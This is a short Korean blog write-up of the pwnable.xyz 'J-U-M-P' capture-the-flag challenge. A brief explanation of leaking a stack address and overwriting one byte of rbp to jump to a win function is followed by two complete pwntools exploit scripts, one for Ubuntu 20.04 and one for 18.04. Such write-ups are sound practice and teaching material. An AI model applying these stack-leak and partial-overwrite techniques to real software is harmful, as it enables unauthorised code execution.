pwnable.xyz / J-U-M-P

pwn/pwnable.xyz

pwnable.xyz / J-U-M-P

lok2h4rd 2022. 5. 15. 22:59

스택 주소를 릭할 수 있고 rbp를 1byte overwrite할 수 있다

rbp 계산 잘해서 rbp-0x11을 1byte변조해서 win함수로 만들고 rbp-0x8로 이동해서 그쪽으로 jmp하도록 하면된다

~~로컬에서는 되는데 리모트에서는 안된다...~~

ubuntu 18.04로 해보면 익스가 되는데 오프셋 차이인 것 같다

ubntu 20.02

from pwn import *
#context.log_level = "debug"


#p = remote("svc.pwnable.xyz", 30012)
p = process("./j-u-m-p")
#gdb.attach(p)


def ovr_data(data):
    p.recvuntil(b"> ")
    p.send(data)

def st_leak():
    p.recvuntil(b"> ")
    p.sendline(b"3")


st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)

main_rbp = leak - 0x108
target_ret = main_rbp - 0x8

log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))


payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)

p.recvuntil(b"> ")
p.sendline(b"123")

payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)

p.interactive()

ubuntu 18.04

from pwn import *
#context.log_level = "debug"


p = remote("svc.pwnable.xyz", 30012)
#p = process("./j-u-m-p")
#gdb.attach(p)


def ovr_data(data):
    p.recvuntil(b"> ")
    p.send(data)

def st_leak():
    p.recvuntil(b"> ")
    p.sendline(b"3")


st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)

main_rbp = leak - 0xf8
target_ret = main_rbp - 0x8

log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))


payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)

p.recvuntil(b"> ")
p.sendline(b"123")

payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)

p.interactive()